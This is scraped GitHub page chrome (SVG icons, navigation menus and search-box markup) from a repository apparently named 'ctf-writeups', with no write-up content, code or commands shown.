<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="162845937" data-scoped-search-url="/KEERRO/ctf-writeups/search" data-owner-scoped-search-url="/users/KEERRO/search" data-unscoped-search-url="/search" data-turbo="false" action="/KEERRO/ctf-writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="6Wdvn74lbEbeO9l+MSTj1xcAuCoIfmQbm6inoWmBSnmWVpaqYo+HXilbmXoFZ2Oi7TheF+yXLp4Z+cvQG8B7Uw==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
